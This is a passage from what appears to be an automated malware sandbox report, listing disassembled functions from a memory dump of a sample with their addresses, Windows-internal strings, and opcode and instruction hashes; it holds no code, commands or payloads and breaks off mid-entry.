                                                                                                              • Opcode Fuzzy Hash: 9194c7220f2c715bd620de85860a49d66fd70cf6d00794c449dc2370aca40808
                                                                                                              • Instruction Fuzzy Hash: D9518D71504742CFD725DF68C544AA7FBE4AFC4304F20883EFAAA87286E7709545CB92
                                                                                                              Function 0173A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0173A2FB
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0173A309
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              • Opcode ID: 2961fee78710ec4f6b442b983a91facbf4368796d0c458d95690eed551b022d5
                                                                                                              • Instruction ID: 9ad592bc23bf515a950679db2fe9e1d2eaad9921acba566e08de4a9dcceaf8f8
                                                                                                              • Opcode Fuzzy Hash: 2961fee78710ec4f6b442b983a91facbf4368796d0c458d95690eed551b022d5
                                                                                                              • Instruction Fuzzy Hash: E341DF30A04659EBDB12DF59D885BAEFBF4FF84700F2440A9E944DB2A2E3B5D940CB40
                                                                                                              Function 0176A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                              • Opcode ID: e8660e0640eeb34ce4fcc688838d023b2d39fdf112347bb5a337e8be003d47c4
                                                                                                              • Instruction ID: 94d41e256acf1e9f9d52e64fe8c22cc2f5bb97c94cfcb3b8883115cab71ff924
                                                                                                              • Opcode Fuzzy Hash: e8660e0640eeb34ce4fcc688838d023b2d39fdf112347bb5a337e8be003d47c4
                                                                                                              • Instruction Fuzzy Hash: 1E01DCB2250740AFD322DF24CD49B26B7E8EB84B25F018939AA58D7190E334E908CB46
                                                                                                              Function 0173C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              • Opcode ID: 8bde832d3124899d8f827d4b9ce860dfe92d2d2cd1ef45ab9ae92c0f262c9c89
                                                                                                              • Instruction ID: 98e2bc9877f4157735fba3fe4603c05c2519842918f8e03eb5a55f7c98dfa7a6
                                                                                                              • Opcode Fuzzy Hash: 8bde832d3124899d8f827d4b9ce860dfe92d2d2cd1ef45ab9ae92c0f262c9c89
                                                                                                              • Instruction Fuzzy Hash: 9F827C75E002198FEB25CFA9C884BEDFBB5BF88710F14816AE959AB352D7309D41CB50
                                                                                                              Function 017B6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: 113d4a2981c32de9849bc781cee997c74d795d33cb72ee5497a50c1c5f7bc3b6
                                                                                                              • Instruction ID: 942240f5964a0452fd7ccb9bb6818450776fa06c6d4d50ba8c45dfdc091eb0b8
                                                                                                              • Opcode Fuzzy Hash: 113d4a2981c32de9849bc781cee997c74d795d33cb72ee5497a50c1c5f7bc3b6
                                                                                                              • Instruction Fuzzy Hash: 5A913F72941219ABEB21DF95CD85FEEBBB8EF18B50F104065F700AB195D774AD04CBA0
                                                                                                              Function 0176A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              • Opcode ID: a3d8d5d5756939a59cfd8eaec647d25f88b803cfa28ecf9864ea4fb24a4a95d2
                                                                                                              • Instruction ID: 665d713f20599f96e972237f07e1443a89caf70a62e6af5de185d90970532102
                                                                                                              • Opcode Fuzzy Hash: a3d8d5d5756939a59cfd8eaec647d25f88b803cfa28ecf9864ea4fb24a4a95d2
                                                                                                              • Instruction Fuzzy Hash: 1E717DB5E0021ACFDF29CF9CC590AADFBB5BF88710F58826AF905A7245E7319941CB50
                                                                                                              Function 017D4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
                                                                                                              • Opcode ID: a176b7c2b2ce7ac7cac99c1bbee013052980787071c44e337fc876ca2239bc2d
                                                                                                              • Instruction ID: a8701577e8ff937f3d86d846a4dc3bb80392304b95da049739231a5725e2672d
                                                                                                              • Opcode Fuzzy Hash: a176b7c2b2ce7ac7cac99c1bbee013052980787071c44e337fc876ca2239bc2d
                                                                                                              • Instruction Fuzzy Hash: 1251B072D0022E9BDF11DF99C844AAEFBB4AF58A40F05416AEA12BB654D7348D01CFE5
                                                                                                              Function 0174E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              • Opcode ID: 43691f55e92c828fd48ab055d9d7d6db24bd9b1ce542f0b78f600f66831a005e
                                                                                                              • Instruction ID: 0e951e7a80d8fd499501ddbcedfa983ec852557af33c88c05e9ae6665bfda8e7
                                                                                                              • Opcode Fuzzy Hash: 43691f55e92c828fd48ab055d9d7d6db24bd9b1ce542f0b78f600f66831a005e
                                                                                                              • Instruction Fuzzy Hash: 3F4160725083129BD712DB79C884B6BF7D8BF88724F44096DF684D7180EB78D904C796
                                                                                                              Function 0172CDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AlternateCodePage
                                                                                                              • API String ID: 0-3889302423
                                                                                                              • Opcode ID: f606d88f8a3a4225e37998b43057f1b69d5fc0b172cc1a0252f4cb57e8b9926c
                                                                                                              • Instruction ID: 1ef293c40ac0bb6e332642c1a12aaf7d6e1c412e066be989deed472905424ccf
                                                                                                              • Opcode Fuzzy Hash: f606d88f8a3a4225e37998b43057f1b69d5fc0b172cc1a0252f4cb57e8b9926c
                                                                                                              • Instruction Fuzzy Hash: 0541C372D40219ABDF25EB98C884AEEFBF8FF54710F24415AE511E7254D7709A81CB60
                                                                                                              Function 017AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              • Opcode ID: 1ac719cfb79e52d52f37821250bc5fdb4f7242cea298057c6704217816931208
                                                                                                              • Instruction ID: 261303606a7ea779116a457aadbd4d6e4a2e21837db19edacb768875f5fe2dc3
                                                                                                              • Opcode Fuzzy Hash: 1ac719cfb79e52d52f37821250bc5fdb4f7242cea298057c6704217816931208
                                                                                                              • Instruction Fuzzy Hash: BA4142B1D4112DAADF22DB50CC84FDEF77CAB44724F4046A5EB18AB144DB709E898FA4
                                                                                                              Function 017C6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              • Opcode ID: aea5ae35cd8c6de1448e2d00764fb17fe4a3be0add2e5846b203fd20dce003e7
                                                                                                              • Instruction ID: 5aea71e3ab0ceede9b28aae0797e0be0c0c445a83b513b4a927168ba590fb352
                                                                                                              • Opcode Fuzzy Hash: aea5ae35cd8c6de1448e2d00764fb17fe4a3be0add2e5846b203fd20dce003e7
                                                                                                              • Instruction Fuzzy Hash: 8831E531A006199BEB32DF69C894BEEFBA8DF05B04F14406CF951AB382D775E905CB50
                                                                                                              Function 017ACA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              • Opcode ID: 5e9fd23d939ee0d2690a42bc5caf7d91e886ec5d216678d11ec3c88e15b1c075
                                                                                                              • Instruction ID: 6abd71c51b76ae5f4d8a649d0693ea794fa8b57bbf2cfca12c060473c0ba101f
                                                                                                              • Opcode Fuzzy Hash: 5e9fd23d939ee0d2690a42bc5caf7d91e886ec5d216678d11ec3c88e15b1c075
                                                                                                              • Instruction Fuzzy Hash: 07310336900519BFEB16DB58C855EBFFB74EBC0720F414269AA15AB250D7319E00EBE0
                                                                                                              Function 017B892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017B895E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                              • API String ID: 0-702105204
                                                                                                              • Opcode ID: 8e5acaa86775fb618eeadd03925d3d3546774a8fbec4fd02e72ab1d526e44683
                                                                                                              • Instruction ID: a135b3295bc0dc0815c63719655cd4f293c75b9d6a13664355e7d068826dcb57
                                                                                                              • Opcode Fuzzy Hash: 8e5acaa86775fb618eeadd03925d3d3546774a8fbec4fd02e72ab1d526e44683
                                                                                                              • Instruction Fuzzy Hash: 9501F7712402219BEB325E59C8C8BE6FB69EF82794B04001DF7814A155CB20A881CB93
                                                                                                              Function 017D2000 Relevance: .8, Instructions: 757COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 24f2d03c8bbf73275ea39cf4687256d1e031739f28e054620fc31f9765eed83f
                                                                                                              • Instruction ID: 933612857a54bab6abedf9cf276b4ef744cdf47fb5c2cc379f091f905bda20ea
                                                                                                              • Opcode Fuzzy Hash: 24f2d03c8bbf73275ea39cf4687256d1e031739f28e054620fc31f9765eed83f
                                                                                                              • Instruction Fuzzy Hash: 6942E2326083499FD725CF68C891A6BFBF5BF88300F08492DFA9697252D771D846CB52
                                                                                                              Function 017C8158 Relevance: .6, Instructions: 617COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c9174d14a469ad3d3ed48350a9e67d06d3d317c07cd54a7c365d4841cc2bb5ee
                                                                                                              • Instruction ID: 7c2d4208465756154ffba641a623bc35bb6bc098b5a735504c9b35fafb055755
                                                                                                              • Opcode Fuzzy Hash: c9174d14a469ad3d3ed48350a9e67d06d3d317c07cd54a7c365d4841cc2bb5ee
                                                                                                              • Instruction Fuzzy Hash: 0D425C75A002199FEB25CF69C881BADFBF5BF48700F18819DE949EB242D7349981CF51
                                                                                                              Function 01742840 Relevance: .6, Instructions: 605COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e5e766ebfddd0a1534338ee0207437e50cd48f452edaa7da3e2d7dfc5c11ecc4
                                                                                                              • Instruction ID: 66589c169c8727a77f82b721fc62b30e085d59e9649f6ec9bcd76af6eb6b88f4
                                                                                                              • Opcode Fuzzy Hash: e5e766ebfddd0a1534338ee0207437e50cd48f452edaa7da3e2d7dfc5c11ecc4
                                                                                                              • Instruction Fuzzy Hash: F932DE70A007558BEF25CF69D848BBEFBF2BF84304F24421DE5869B285D735A949CB90
                                                                                                              Function 017DA118 Relevance: .6, Instructions: 591COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 549d65f22a02044a1985e64a04e14181249f77c8eb7b668ab6333b4c5ee16210
                                                                                                              • Instruction ID: dadd1cba5cd9cda1057b21abe9409ff4e1e65967dff9250845d7b9a5c47c31a1
                                                                                                              • Opcode Fuzzy Hash: 549d65f22a02044a1985e64a04e14181249f77c8eb7b668ab6333b4c5ee16210
                                                                                                              • Instruction Fuzzy Hash: 7122CD70204669CBEB25CF2DC094772FBF1BF44300F18849AE9968F286E775E592CB61
                                                                                                              Function 01736A50 Relevance: .5, Instructions: 548COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 186ccf1a6d91dd0cf48b0e53a8f456a705665e57688e81da2478aa8ce23e0f71
                                                                                                              • Instruction ID: 09fc6ce793976412a8862f138d6b48b43557d3484786f28b51246b7e2cf195cf
                                                                                                              • Opcode Fuzzy Hash: 186ccf1a6d91dd0cf48b0e53a8f456a705665e57688e81da2478aa8ce23e0f71
                                                                                                              • Instruction Fuzzy Hash: 0132AD71A04205DFDB25CF68D880BAAFBF1FF88310F2485A9E955AB392D730E955CB50
                                                                                                              Function 01754A35 Relevance: .4, Instructions: 423COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction ID: 11197c980730d2b751b00dd656881e645f8f4769a2f60e2f12b7dee701890515
                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction Fuzzy Hash: 63F16F71E0021A9BDF55CFA9D584BAEFBF5AF48710F048169ED06AB344E7B4D881CB50
                                                                                                              Function 017C892B Relevance: .4, Instructions: 386COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6fe770e43500436b7e8e1c6c2788561f72e05e20e75e724ba645ca5b7ae0f55
                                                                                                              • Instruction ID: 5954953d70328224d2e1d7e7338d3eb90d1b690e208bafc1b7672f095ebf36b6
                                                                                                              • Opcode Fuzzy Hash: e6fe770e43500436b7e8e1c6c2788561f72e05e20e75e724ba645ca5b7ae0f55
                                                                                                              • Instruction Fuzzy Hash: C6D1F071A0061A9BDF15CF68C841BFEF7F1AF88B04F1881AED955A7241E735EA01CB61
                                                                                                              Function 017365D0 Relevance: .4, Instructions: 383COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 37a044da7f0c6a1b5206bf75f25ad43d1a31374cba0f675be01eef452c0d78bd
                                                                                                              • Instruction ID: 2c1cd8610147619a6a187d9a0a7e2ad03f0f7378f30f14f90252e35bee38b990
                                                                                                              • Opcode Fuzzy Hash: 37a044da7f0c6a1b5206bf75f25ad43d1a31374cba0f675be01eef452c0d78bd
                                                                                                              • Instruction Fuzzy Hash: ABE16971608342DFC715CF28C094A6AFBE0BF89314F55896DF99987352EB31EA05CB92
                                                                                                              Function 01728397 Relevance: .4, Instructions: 380COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3033275775d94159b1d8db0df20ca384b60dd5c8d236175385579ab813142733
                                                                                                              • Instruction ID: a357379d289031f00c828a804af09275a0fee60b74d20b2201f5473b7246aa27
                                                                                                              • Opcode Fuzzy Hash: 3033275775d94159b1d8db0df20ca384b60dd5c8d236175385579ab813142733
                                                                                                              • Instruction Fuzzy Hash: C4D12471B402268BCB14DF69C880ABAF7F1FF54308F14422DE912DB281E735EA52CB61
                                                                                                              Function 017B8243 Relevance: .3, Instructions: 322COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction ID: 878f6c99cafdf162594425a73908b1746ce8101904812e4e2c01fbb9bb1503d4
                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction Fuzzy Hash: E3B17C75A00609AFDB24DF99C984BEBFBBDBF84304F10446DAA02A7794DB34E945CB11
                                                                                                              Function 01740535 Relevance: .3, Instructions: 300COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction ID: b54d83913c0acdba1eca3e0ba1e4110fc76c8042d8964e759db2cf53cc5f2b70
                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction Fuzzy Hash: DFB1F731600646AFDF26DB68C954BBEFBF6EF48300F280199E65697285D730ED45CB90
                                                                                                              Function 01750DE1 Relevance: .3, Instructions: 295COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 566675f4c7fd5dc08512bb9732fc712bad1a4311b5a2c065bf1e27eff27a4c75
                                                                                                              • Instruction ID: d3e31548bc5d20118f73d1914e0bc614915ecadc7f1e77a938cb7e818168bcb7
                                                                                                              • Opcode Fuzzy Hash: 566675f4c7fd5dc08512bb9732fc712bad1a4311b5a2c065bf1e27eff27a4c75
                                                                                                              • Instruction Fuzzy Hash: F1C17C70E04259DFDB25DFA9D884AADFBB5FF88304F104169E905AB285E7B0A945CF80
                                                                                                              Function 017383C0 Relevance: .3, Instructions: 281COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07f454243e4709e9aa8eea7a1ea73605b77856405a27a68f7c556ca17f366341
                                                                                                              • Instruction ID: f5f0f5709d011c1327660fe17c4a1da357a19effd7f4617dca3eea148ee47973
                                                                                                              • Opcode Fuzzy Hash: 07f454243e4709e9aa8eea7a1ea73605b77856405a27a68f7c556ca17f366341
                                                                                                              • Instruction Fuzzy Hash: 9BC137741083818FEB64CF19C494BAAF7E5BF88304F544A6DE98987391D774EA48CF92
                                                                                                              Function 0172C427 Relevance: .3, Instructions: 280COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a78c86c36fa352a6bc5ed8541deed80f9aa7014c28c12b10138a4f120d6f38f3
                                                                                                              • Instruction ID: 1a890e10d7ae7b868d79a466dcc314bfde5ebadfa0e67887fac1ad249cf27dbd
                                                                                                              • Opcode Fuzzy Hash: a78c86c36fa352a6bc5ed8541deed80f9aa7014c28c12b10138a4f120d6f38f3
                                                                                                              • Instruction Fuzzy Hash: 00B17070A002668BDB75DF69C880BADF7B1EF54700F2485EAD50AE7245EB70DD86CB21
                                                                                                              Function 0175E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fa940caca15313f236dcba695bbd30dda6a3ecf92a2793fb859b1978b48c84f4
                                                                                                              • Instruction ID: 22200c4d9c7d91badbc864b7f3649d3894927b63049db704fb01ac2018285f50
                                                                                                              • Opcode Fuzzy Hash: fa940caca15313f236dcba695bbd30dda6a3ecf92a2793fb859b1978b48c84f4
                                                                                                              • Instruction Fuzzy Hash: 0CA13531E00659AFEF22DF58D848BAEFFB4EB01754F144161EE50AB291DBB49E44CB90
                                                                                                              Function 01770185 Relevance: .3, Instructions: 276COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
                                                                                                              • Instruction ID: 87ad28ca5e0b3cf6bfdf7157e9486b6137bd61ff950508f0d2ca4edf1088d241
                                                                                                              • Opcode Fuzzy Hash: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
                                                                                                              • Instruction Fuzzy Hash: FBA1AE71B0061ADBDF25CF69C990BAAF7F1FF56318F104129EA4597282EB34E911CB90
                                                                                                              Function 01804500 Relevance: .3, Instructions: 275COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
